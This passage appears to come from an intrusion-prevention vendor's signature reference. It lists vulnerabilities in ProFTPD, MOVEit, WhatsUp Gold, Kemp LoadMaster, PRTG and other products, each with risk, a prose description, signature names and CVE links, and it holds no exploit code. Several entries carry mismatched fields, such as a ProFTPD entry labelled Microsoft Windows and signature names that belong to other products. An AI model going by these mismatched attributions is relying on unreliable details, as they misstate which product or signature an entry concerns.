sgpkg-ips-374-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ProFTPD

Type:

Buffer Overflow

Description:

There is a buffer overflow in ProFTPD FTP server. The vulnerability is due to insufficient validation when processing user input, if a TELNET_IAC escape sequence is received, the server will miscalculate the required length of a stack buffer. A remote attacker could exploit this vulnerability to execute arbitrary code in the security context of the FTP process or daemon.

Situation:

FTP_CS-ProFTPD-FTP-Server-Telnet-IAC-Stack-Buffer-Overflow
FTP_CS-ProFTPD-SReplace-Buffer-Overflow

References:

CVE-2010-4221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4221

BID-44562
http://www.securityfocus.com/bid/44562

ProFTPD-Mod-Copy-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in ProFTPd

Risk:

High

First detected in:

sgpkg-ips-1352-5242

Last changed:

sgpkg-ips-1352-5242

Platform:

Generic

Software:

ProFTPD

Type:

Malfunction

Description:

There exists a vulnerability in ProFTPD FTP server, versions 1.3.5b and before, which allows remote attackers to upload arbitrary files and possibly exexcute code without authentication, due to a design flaw in 'mod_copy'.

Situation:

FTP_CS-ProFTPD-Mod-Copy-Arbitrary-File-Upload

References:

CVE-2019-12815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12815

ProFTPD-Mod_Copy-Remote-File-Copying

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-643-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ProFTPD

Type:

Malfunction

Description:

A remote file copying vulnerability exists in ProFTPD. The vulnerability is due to a design weakness within module mod_copy. A remote unauthenticated user can manipulate arbitrary files on the target system.

References:

CVE-2015-3306
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306

OSVDB-120834
http://www.osvdb.org/120834

ProFTPD-Mod_Copy-Unauthenticated-Remote-File-Copying

About this vulnerability:

A vulnerability in ProFTPD

Risk:

Moderate

First detected in:

sgpkg-ips-645-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ProFTPD

Type:

Malfunction

Description:

An access control weakness exists in mod_copy for ProFTPD. The vulnerability is due to a lack of access control and allows a remote, unauthenticated user to manipulate files on the target system. A remote attacker could exploit this vulnerability by sending crafted FTP commands to the affected service. Successful exploitation would result in copying of files on the file system of the affected host, which might lead to arbitrary code execution on the target system in certain configurations.

Situation:

FTP_CS-ProFTPD-Mod_Copy-Unauthenticated-Remote-File-Copying

References:

CVE-2015-3306
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306

BID-74238
http://www.securityfocus.com/bid/74238

OSVDB-120834
http://www.osvdb.org/120834

Progea-Movicon-11-Server-Denial-Of-Service

About this vulnerability:	Progea Movicon 11 Server denial of service.
Risk:	High
First detected in:	sgpkg-ips-628-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Progea Movicon
Type:	Malfunction
Description:	A vulnerability in Progea Movicon 11 Server that allows an attacker to crash the service by sending a specially crafted tcp packet.
Situation:	Generic_CS-Progea-Movicon-11-Server-Denial-Of-Service

Progea-Movicon-EIDP-Denial-Of-Service

About this vulnerability:

A vulnerability in Progea Movicon

Risk:

High

First detected in:

sgpkg-ips-568-5211

Last changed:

sgpkg-ips-1453-5242

Platform:

Generic

Software:

Progea Movicon

Type:

Buffer Overflow

Description:

There is a memory corruption vulnerability in Progea Movicon. A remote attacks may cause a denial of service and execute arbitrary code via an EIDP packet with a large size field.

Situation:

HTTP_CS-Progea-Movicon-EIDP-Denial-Of-Service

References:

CVE-2011-3499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3499

BID-49605
http://www.securityfocus.com/bid/49605

OSVDB-75492
http://www.osvdb.org/75492

Progea-Movicon-Negative-Content-Length-Buffer-Overflow

About this vulnerability:

A vulnerability in Progea Movicon

Risk:

High

First detected in:

sgpkg-ips-568-5211

Last changed:

sgpkg-ips-1584-5242

Platform:

Generic

Software:

Progea Movicon

Type:

Buffer Overflow

Description:

A buffer overflow exists in Progea Movicon. This vulnerability is caused by an error in processing HTTP packets containing negative Content-Length header field values resulting in a heap buffer overflow. A remote unauthenticated attacker can exploit this vulnerability by sending crafted messages to port 808/TCP on the target server. Successful exploitation could result in code execution with privileges of the Progea Movicon application.

Situation:

HTTP_CRL-Progress-Flowmon-Command-Injection-CVE-2024-2389

References:

BID-49605
http://www.securityfocus.com/bid/49605

Progress-Flowmon-Command-Injection-CVE-2024-2389

About this vulnerability:

A vulnerability in Progress Flowmon

Risk:

High

First detected in:

sgpkg-ips-1719-5242

Last changed:

sgpkg-ips-1719-5242

Platform:

Generic

Software:

Progress Flowmon

Type:

Input Validation

Description:

A pre-authentication command injection vulnerability has been reported in Progress Flowmon. Successful exploitation could lead in arbitrary code execution.

Situation:

References:

CVE-2024-2389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2389

Progress-Kemp-Loadmaster-Addselectedrs-And-Addselectedvs-Command-Injection

About this vulnerability:

A vulnerability in Progress Software Kemp LoadMaster

Risk:

Moderate

First detected in:

sgpkg-ips-1733-5242

Last changed:

sgpkg-ips-1733-5242

Platform:

Generic

Software:

Progress Software Kemp LoadMaster

Type:

Input Validation

Description:

Improper user input validation in addSelectedRS and addSelectedVS functions causes a command execution vulnerability in Progress Software Kemp LoadMaster. A successful exploitation can allow an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CRL-Progress-Kemp-Loadmaster-Addselectedrs-And-Addselectedvs-Command-Injection

References:

CVE-2024-2448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2448

Progress-Kemp-Loadmaster-Logging-Command-Injection-CVE-2024-56131

About this vulnerability:

A vulnerability in Progress Software Kemp LoadMaster

Risk:

Moderate

First detected in:

sgpkg-ips-1848-5242

Last changed:

sgpkg-ips-1848-5242

Platform:

Generic

Software:

Progress Software Kemp LoadMaster

Type:

Input Validation

Description:

Insufficient validation of the user input in the logging controller causes a command injection vulnerability in Progress Software Kemp LoadMaster. A successful exploitation allows an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CRL-Progress-Kemp-Loadmaster-Logging-Command-Injection-CVE-2024-56131

References:

CVE-2024-56131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56131

Progress-Kemp-Loadmaster-Mangle-Stack-Based-Buffer-Overflow-CVE-2025-1758

About this vulnerability:

A vulnerability in Progress Software Kemp LoadMaster

Risk:

Moderate

First detected in:

sgpkg-ips-1866-5242

Last changed:

sgpkg-ips-1866-5242

Platform:

Generic

Software:

Progress Software Kemp LoadMaster

Type:

Buffer Overflow

Description:

Insufficient validation of user input in the mangle executable causes a buffer overflow vulnerability in Progress Software Kemp LoadMaster. A successful exploitation allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Progress-Kemp-Loadmaster-Mangle-Stack-Based-Buffer-Overflow-CVE-2025-1758

References:

CVE-2025-1758
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1758

Progress-Kemp-Loadmaster-Read_Pass-Command-Injection

About this vulnerability:

A vulnerability in Progress Software Kemp LoadMaster

Risk:

Moderate

First detected in:

sgpkg-ips-1795-5242

Last changed:

sgpkg-ips-1795-5242

Platform:

Generic

Software:

Progress Software Kemp LoadMaster

Type:

Input Validation

Description:

Improper validation of a user-supplied string before using it to execute a system command causes a command injection vulnerability in Kemp LoadMaster. A successful exploitation allows an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CRL-Progress-Kemp-Loadmaster-Read_Pass-Command-Injection

References:

CVE-2024-7591
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7591

Progress-Kemp-Loadmaster-Rest-API-Command-Injection

About this vulnerability:

A vulnerability in Progress Kemp LoadMaster

Risk:

High

First detected in:

sgpkg-ips-1720-5242

Last changed:

sgpkg-ips-1720-5242

Platform:

Generic

Software:

Progress Software Kemp LoadMaster

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Progress Kemp LoadMaster. This vulnerability is due to improper user input validation when processing REST API requests. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to a target server. Successful exploitation can lead to arbitrary command execution.

Situation:

HTTP_CRL-Progress-Kemp-Loadmaster-Rest-API-Command-Injection
HTTP_CSH-Progress-Kemp-Loadmaster-Rest-API-Command-Injection

References:

CVE-2024-1212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1212

Progress-MOVEit-Authentication-Bypass-CVE-2024-5806

About this vulnerability:

A vulnerability in MOVEit

Risk:

Critical

First detected in:

sgpkg-ips-1745-5242

Last changed:

sgpkg-ips-1745-5242

Platform:

Generic

Software:

MOVEit

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in the SFTP module of the Progress MOVEit Transfer software. A successful exploit allows logging in as any existing user and gaining full control over the files on the server.

Situation:

HTTP_CRL-Progress-MOVEit-Authentication-Bypass-CVE-2024-5806

References:

CVE-2024-5806
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5806

Progress-MOVEit-Externaltokenauthenticator-Denial-Of-Service

About this vulnerability:

A vulnerability in Progress Software MOVEit Transfer

Risk:

High

First detected in:

sgpkg-ips-1614-5242

Last changed:

sgpkg-ips-1614-5242

Platform:

Generic

Software:

MOVEit

Type:

Input Validation

Description:

An uncaught exception vulnerability has been reported for MOVEit Transfer. This vulnerability is due to insufficient validation of external tokens sent to the REST API. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. A successful attack would result in denial of service conditions.

Situation:

HTTP_CRL-Progress-MOVEit-Externaltokenauthenticator-Denial-Of-Service

References:

CVE-2023-36933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36933

Progress-MOVEit-Transfer-Folderlistrecursive-SQL-Injection

About this vulnerability:

A vulnerability in Progress Software MOVEit Transfer

Risk:

Moderate

First detected in:

sgpkg-ips-1616-5242

Last changed:

sgpkg-ips-1616-5242

Platform:

Generic

Software:

MOVEit

Type:

Input Validation

Description:

Insufficient validation of the folder IDs sent as a parameter to the "folderlistrecursive" transaction of the "machine.aspx" endpoint causes an SQL injection vulnerability in Progress MOVEit. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CS-Progress-MOVEit-Transfer-Folderlistrecursive-SQL-Injection

References:

CVE-2023-36932
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36932

Progress-MOVEit-Transfer-Moveitisapi-X-Silock-Fileid-SQL-Injection

About this vulnerability:

A vulnerability in MOVEit

Risk:

Moderate

First detected in:

sgpkg-ips-1613-5242

Last changed:

sgpkg-ips-1613-5242

Platform:

Generic

Software:

MOVEit

Type:

Input Validation

Description:

Insufficient validation of the "X-siLock-FileID" parameter sent to the "MOVEitISAPI.dll" endpoint causes an SQL injection vulnerability in MOVEit. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CS-Progress-MOVEit-Transfer-Moveitisapi-X-Silock-Fileid-SQL-Injection

References:

CVE-2023-36932
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36932

Progress-MOVEit-Transfer-Silcerttouser-SQL-Injection

About this vulnerability:

A vulnerability in Progress Software MOVEit Transfer

Risk:

High

First detected in:

sgpkg-ips-1602-5242

Last changed:

sgpkg-ips-1602-5242

Platform:

Generic

Software:

MOVEit

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported for MOVEit Transfer. This vulnerability is due to flawed input validation sent to the endpoint "/certtousergw.aspx". A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. A successful attack may result in arbitrary SQL command execution against the database on the target server.

Situation:

HTTP_CSH-Progress-MOVEit-Transfer-Silcerttouser-SQL-Injection

References:

CVE-2023-35036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35036

Progress-MOVEit-Transfer-SQL-Injection-CVE-2023-34362

About this vulnerability:

A vulnerability in MOVEit Transfer

Risk:

High

First detected in:

sgpkg-ips-1598-5242

Last changed:

sgpkg-ips-1598-5242

Platform:

Generic

Software:

MOVEit

Type:

Input Validation

Description:

A SQL injection vulnerability has been reported for MOVEit Transfer. This vulnerability is due to flawed input validation sent to the endpoints "/moveitsapi.dll" and "/guestaccess.aspx". A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. A successful attack may result in arbitrary SQL command execution against the database on the target server.

Situation:

HTTP_CSH-Progress-MOVEit-Transfer-SQL-Injection-CVE-2023-34362

References:

CVE-2023-34362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34362

Progress-MOVEit-Transfer-Userengine-Usercheckclientcert-SQL-Injection

About this vulnerability:

A vulnerability in Progress Software MOVEit Transfer

Risk:

High

First detected in:

sgpkg-ips-1605-5242

Last changed:

sgpkg-ips-1605-5242

Platform:

Generic

Software:

MOVEit

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported for MOVEit Transfer. This vulnerability is due to flawed input validation sent to MOVEit Transfer. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. A successful attack may result in arbitrary SQL command execution against the database on the target server.

Situation:

HTTP_CSH-Progress-MOVEit-Transfer-Silcerttouser-SQL-Injection

References:

CVE-2023-35708
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35708

Progress-MOVEit-Transfer-Userprocesspasschangerequest-SQL-Injection

About this vulnerability:

A vulnerability in Progress Software MOVEit Transfer

Risk:

High

First detected in:

sgpkg-ips-1611-5242

Last changed:

sgpkg-ips-1611-5242

Platform:

Generic

Software:

MOVEit

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported for MOVEit Transfer. This vulnerability is due to insufficient validation of encrypted query parameters sent to the server. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. A successful attack would result in arbitrary SQL command execution against the database on the target server, which can lead to arbitrary code execution under the security context of the running service.

Situation:

HTTP_CSU-Progress-MOVEit-Transfer-Userprocesspasschangerequest-SQL-Injection
HTTP_CSH-Progress-MOVEit-Transfer-Userprocesspasschangerequest-SQL-Injection

References:

CVE-2023-36934
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36934

Progress-Telerik-Report-Server-Authentication-Bypass-CVE-2024-4358

About this vulnerability:

An attempt to exploit a vulnerability in Progress Telerik Report Server detected

Risk:

High

First detected in:

sgpkg-ips-1733-5242

Last changed:

sgpkg-ips-1733-5242

Platform:

Generic

Software:

Progress Telerik Report Server

Type:

Input Validation

Description:

In Progress Telerik Report Server version 10.0.24.305 or earlier, an unauthenticated attacker can gain access to restricted functionality via an authentication bypass vulnerability.

Situation:

HTTP_CSU-Progress-Telerik-Report-Server-Authentication-Bypass-CVE-2024-4358

References:

CVE-2024-4358
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4358

Progress-WhatsUp-Gold-AppProfileImport-Unrestricted-File-Upload

About this vulnerability:

An attempt to exploit a vulnerability in Progress WhatsUp Gold detected

Risk:

High

First detected in:

sgpkg-ips-1770-5242

Last changed:

sgpkg-ips-1770-5242

Platform:

Windows

Software:

Progress WhatsUp Gold

Type:

Input Validation

Description:

A vulnerability in Progress WhatsUp Gold, versions before 2023.1.3, which allows remote attackers to create arbitrary files and possibly execute remote code, due to the insufficient validation of the AppProfileImportController component.

Situation:

File-Text_Progress-WhatsUp-Gold-AppProfileImport-Unrestricted-File-Upload

References:

CVE-2024-5008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5008

Progress-WhatsUp-Gold-Communitycontroller-Unrestricted-File-Upload

About this vulnerability:

A vulnerability in Progress Software WhatsUp Gold

Risk:

High

First detected in:

sgpkg-ips-1755-5242

Last changed:

sgpkg-ips-1755-5242

Platform:

Generic

Software:

Progress WhatsUp Gold

Type:

Input Validation

Description:

An unrestricted file upload vulnerability has been reported in Progress WhatsUp Gold. This vulnerability is due to improper input validation in the CommunityController component. Successfully exploiting this vulnerability could result in arbitrary file creation without authentication, possibly leading to remote code execution in the context of a service account.

Situation:

HTTP_CS-Progress-WhatsUp-Gold-Communitycontroller-Unrestricted-File-Upload

References:

CVE-2024-4884
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4884

Progress-WhatsUp-Gold-Getfilewithoutzip-Directory-Traversal

About this vulnerability:

A vulnerability in Progress Software WhatsUp Gold

Risk:

High

First detected in:

sgpkg-ips-1760-5242

Last changed:

sgpkg-ips-1760-5242

Platform:

Generic

Software:

Progress WhatsUp Gold

Type:

Input Validation

Description:

A directory traversal vulnerability exists in Progress WhatsUp Gold. This vulnerability is due to improper input validation in the GetFileWithoutZip method. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary file creation or, in the worst case, remote code execution in the context of a service account.

Situation:

File-TextId_Progress-WhatsUp-Gold-Getfilewithoutzip-Directory-Traversal

References:

CVE-2024-4885
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4885

Progress-WhatsUp-Gold-GetSqlWhereClause-SQL-Injection-CVE-2024-46906

About this vulnerability:

A vulnerability in Progress Software WhatsUp Gold

Risk:

Moderate

First detected in:

sgpkg-ips-1865-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

Progress WhatsUp Gold

Type:

Input Validation

Description:

Improper validation of user data within the GetSqlWhereClause function causes an SQL injection vulnerability in Progress WhatsUp Gold. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Progress-WhatsUp-Gold-GetSqlWhereClause-SQL-Injection-CVE-2024-46906

References:

CVE-2024-46906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-46906

Progress-WhatsUp-Gold-Onmessage-Insecure-Deserialization-CVE-2024-5016

About this vulnerability:

A vulnerability in Progress Software WhatsUp Gold

Risk:

High

First detected in:

sgpkg-ips-1774-5242

Last changed:

sgpkg-ips-1774-5242

Platform:

Generic

Software:

Progress WhatsUp Gold

Type:

Input Validation

Description:

An insecure deserialization vulnerability exists in Progress WhatsUp Gold Distributed Edition. This vulnerability is due to improper input validation in the implementation of OnMessage method. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in execution of arbitrary code in the context of system.

Situation:

WebSocket_CS-Progress-WhatsUp-Gold-Onmessage-Insecure-Deserialization-CVE-2024-5016
WebSocket_SS-Progress-WhatsUp-Gold-Onmessage-Insecure-Deserialization-CVE-2024-5016

References:

CVE-2024-5016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5016

Progress-WhatsUp-Gold-SnmpExtendedActiveMonitor-Directory-Traversal

About this vulnerability:

A vulnerability in Progress WhatsUp Gold

Risk:

High

First detected in:

sgpkg-ips-1846-5242

Last changed:

sgpkg-ips-1846-5242

Platform:

Generic

Software:

Progress WhatsUp Gold

Type:

Directory Traversal

Description:

A vulnerability in Progress WhatsUp Gold, versions prior to 24.0.2, which allows remote attackers to disclose sensitive information, due to a directory traversal in the SnmpExtendedActiveMonitor endpoint.

Situation:

HTTP_CRL-Progress-WhatsUp-Gold-SQL-Injection-CVE-2024-6670

References:

CVE-2024-12105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12105

Progress-WhatsUp-Gold-SQL-Injection-CVE-2024-6670

About this vulnerability:

A vulnerability in Progress WhatsUp Gold

Risk:

High

First detected in:

sgpkg-ips-1778-5242

Last changed:

sgpkg-ips-1778-5242

Platform:

Generic

Software:

Progress WhatsUp Gold

Type:

SQL Injection

Description:

A SQL injection vulnerability has been reported in WhatsUp Gold versions before 2024.0.0. A remote, unauthenticated attacker can leverage this vulnerability by first retrieving an encrypted password and then changing it, leading into a takeover of any existing account.

Situation:

References:

CVE-2024-6670
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6670

Progress-WhatsUp-Gold-Testcontroller-Chart-Denial-Of-Service-Vulnerability

About this vulnerability:

A vulnerability in Progress Software WhatsUp Gold

Risk:

High

First detected in:

sgpkg-ips-1760-5242

Last changed:

sgpkg-ips-1760-5242

Platform:

Generic

Software:

Progress WhatsUp Gold

Type:

Resource Starvation

Description:

A denial of service vulnerability has been reported in Progress WhatsUp Gold. This vulnerability is due to improper input validation in the TestController component. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.

Situation:

HTTP_CRL-Progress-WhatsUp-Gold-Testcontroller-Chart-Denial-Of-Service-Vulnerability

References:

CVE-2024-5011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5011

Progress-WhatsUp-Gold-Testcontroller-Information-Disclosure-Vulnerabilities

About this vulnerability:

A vulnerability in Progress Software WhatsUp Gold

Risk:

Moderate

First detected in:

sgpkg-ips-1795-5242

Last changed:

sgpkg-ips-1795-5242

Platform:

Generic

Software:

Progress WhatsUp Gold

Type:

Input Validation

Description:

Improper input validation in the TestController component causes multiple information disclosure vulnerabilities in Progress WhatsUp Gold. A successful exploitation allows an attacker to gain access to information on the system.

Situation:

HTTP_CSU-Progress-WhatsUp-Gold-Testcontroller-Information-Disclosure-Vulnerabilities

References:

CVE-2024-5010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5010

Progress-WhatsUp-Gold-Writedatafile-Directory-Traversal-CVE-2024-46909

About this vulnerability:

A vulnerability in Progress Software WhatsUp Gold

Risk:

High

First detected in:

sgpkg-ips-1834-5242

Last changed:

sgpkg-ips-1834-5242

Platform:

Generic

Software:

Progress WhatsUp Gold

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in Progress WhatsUp Gold. This vulnerability is due to improper input validation in the WriteDataFile method. Successfully exploiting this vulnerability could result in arbitrary file creation, possibly allowing remote code execution in the context of a service account without any prior authentication requirements.

Situation:

Generic_CS-Progress-WhatsUp-Gold-Potential-Directory-Traversal-CVE-2024-46909
Generic_CS-Progress-WhatsUp-Gold-Directory-Traversal-CVE-2024-46909

References:

CVE-2024-46909
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-46909

Progress-WhatsUp-Gold-Writedatafile-Directory-Traversal-CVE-2024-4883

About this vulnerability:

A vulnerability in Progress Software WhatsUp Gold

Risk:

High

First detected in:

sgpkg-ips-1759-5242

Last changed:

sgpkg-ips-1759-5242

Platform:

Generic

Software:

Progress WhatsUp Gold

Type:

Input Validation

Description:

A directory traversal vulnerability exists in Progress WhatsUp Gold. This vulnerability is due to improper input validation in the WriteDataFile method. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary file creation or, in the worst case, remote code execution in the context of a service account.

Situation:

Generic_CS-Progress-WhatsUp-Gold-Writedatafile-Directory-Traversal-CVE-2024-4883

References:

CVE-2024-4883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4883

Progress-WS_FTP-Server-Ad-Hoc-Transfer-Insecure-Deserialization

About this vulnerability:

A vulnerability in Progress Software WS_FTP Server

Risk:

High

First detected in:

sgpkg-ips-1637-5242

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Progress Software WS_FTP Server

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in the Ad Hoc Transfer module of WS_FTP Server. The vulnerability is due to improper validation of form field values in upload requests. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation results in arbitrary code execution under the security context of NETWORK SERVICE.

Situation:

HTTP_CS-Progress-WS_FTP-Server-Ad-Hoc-Transfer-Insecure-Deserialization

References:

CVE-2023-40044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40044

ProjectSend-Improper-Authentication-CVE-2024-11680

About this vulnerability:

An attempt to exploit a vulnerability in ProjectSend detected

Risk:

High

First detected in:

sgpkg-ips-1806-5242

Last changed:

sgpkg-ips-1806-5242

Platform:

Generic

Software:

ProjectSend

Type:

Input Validation

Description:

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Remote, unauthenticated attackers can exploit this flaw by sending crafted HTTP requests to "options.php", enabling unauthorized modification of the application's configuration. Successful exploitation allows attackers to create accounts, upload webshells, and embed malicious JavaScript.

Situation:

HTTP_CRL-ProjectSend-Improper-Authentication-CVE-2024-11680

References:

CVE-2024-11680
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11680

PROMOTIC-Directory-Traversal

About this vulnerability:	A vulnerability in PROMOTIC
Risk:	High
First detected in:	sgpkg-ips-609-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	PROMOTIC
Type:	Malfunction
Description:	There is a directory traversal vulnerability in PROMOTIC which allows an attacker to download project files and file necessary for decrypting sensitive information.
Situation:	HTTP_CSU-PROMOTIC-Directory-Traversal

ProSafe-Management-System-Arbitrary-File-Upload-Vulnerability

About this vulnerability:

A vulnerability in Netgear ProSafe Management System

Risk:

High

First detected in:

sgpkg-ips-744-5211

Last changed:

sgpkg-ips-1866-5242

Platform:

Generic

Software:

NetGear NMS300

Type:

Insecure Configuration

Description:

An arbitrary file upload vulnerability exists in Netgear Management System NMS300. A remote attacker can use this to upload arbitrary files on the affected system, which may lead to arbitrary code execution with SYSTEM privileges.

Situation:

HTTP_CSH-ProSafe-Management-System-Arbitrary-File-Upload-Vulnerability

References:

CVE-2016-1524
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1524

ProSysInfo-TFTP-Server-TFTPDWIN-Stack-Based-Buffer-Overflow

About this vulnerability:

ProSysInfo TFTP Server TFTPDWIN 0.4.2 Stack Based Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-645-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

ProSysInfo

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in ProSysInfo TFTP Server TFTPDWIN 0.4.2 and earlier which allows remote attackers to execute arbitrary code, or cause a denial of service condition by sending a long file name.

Situation:

TFTP_GE-ProSysInfo-TFTP-Server-TFTPDWIN-Stack-Based-Buffer-Overflow

References:

CVE-2006-4948
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4948

BID-20131
http://www.securityfocus.com/bid/20131

OSVDB-29032
http://www.osvdb.org/29032

Provectus-UI-For-Apache-Kafka-Jmx-Insecure-Deserialization

About this vulnerability:

A vulnerability in Provectus UI for Apache Kafka

Risk:

Moderate

First detected in:

sgpkg-ips-1753-5242

Last changed:

sgpkg-ips-1753-5242

Platform:

Generic

Software:

Provectus UI for Apache Kafka

Type:

Input Validation

Description:

Insecure access to JMX configuration causes an insecure deserialization vulnerability in Provectus UI for Kafka. A successful exploitation of the vulnerability can allow an attacker to execute arbitrary code in the context of the target application.

Situation:

Generic_SS-Provectus-UI-For-Apache-Kafka-Jmx-Insecure-Deserialization

References:

CVE-2024-32030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32030

Proxy-Pro-Professional-GateKeeper-Buffer-Overflow

About this vulnerability:

A Proxy-Pro Professional GateKeeper Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-735-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Proxy-Pro Gatekeeper

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Proxy-Pro Professional Gatekeeper, version4.7, which allows remote attackers to execute arbitrary code via a long GET request.

Situation:

Generic_MySQL-MaxDB-WebDBM-BOF

References:

CVE-2004-0326
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0326

BID-9716
http://www.securityfocus.com/bid/9716

OSVDB-4027
http://www.osvdb.org/4027

ProZilla-FTPSearch-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the FTPSearch functionality in ProZilla

Risk:

Moderate

First detected in:

sgpkg-ips-40-1210

Last changed:

sgpkg-ips-1729-5242

Platform:

Generic

Software:

ProZilla

Type:

Buffer Overflow

Description:

ProZilla is a download accelerator software that has a buffer overflow vulnerability in the handling of malicious responses to FTPSearch requests.

Situation:

HTTP_ProZilla-FTPSearch-Buffer-Overflow

References:

CVE-2005-2961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2961

BID-14993
http://www.securityfocus.com/bid/14993

PRTG-CVE-2023-32781-Authenticated-RCE

About this vulnerability:

An attempt to exploit a vulnerability in PRTG Network Monitor detected

Risk:

High

First detected in:

sgpkg-ips-1708-5242

Last changed:

sgpkg-ips-1708-5242

Platform:

Windows

Software:

PRTG Network Monitor

Type:

Input Validation

Description:

A vulnerability in PRTG Network Monitor, versions 23.2.84.1566 and before, which allows remote attackers to upload and execute arbitary files, into arbitrary folders, on a target system using the -debug flag while running the binary. CVE-2023-32781 and CVE-2023-32782.

Situation:

HTTP_CS-PRTG-CVE-2023-32781-Authenticated-RCE

References:

CVE-2023-32781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32781

PRTG-Network-Monitor-Authenticated-RCE-CVE-2018-9276

About this vulnerability:

A vulnerability in PRTG Network Monitor

Risk:

High

First detected in:

sgpkg-ips-1344-5242

Last changed:

sgpkg-ips-1862-5242

Platform:

Windows

Software:

PRTG Network Monitor

Type:

Input Validation

Description:

There exists a vulnerability in PRTG Network Monitor, versions prior to 18.2.39, which allows remote attackers to execute arbitrary code by using a powershell payload through a malicious notification.

Situation:

HTTP_CRL-PRTG-Network-Monitor-Authenticated-RCE-CVE-2018-9276

References:

CVE-2018-9276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9276

PRTG-Network-Monitor-Local-File-Inclusion-CVE-2018-19410

About this vulnerability:

An attempt to exploit a vulnerability in PRTG Network Monitor detected

Risk:

High

First detected in:

sgpkg-ips-1836-5242

Last changed:

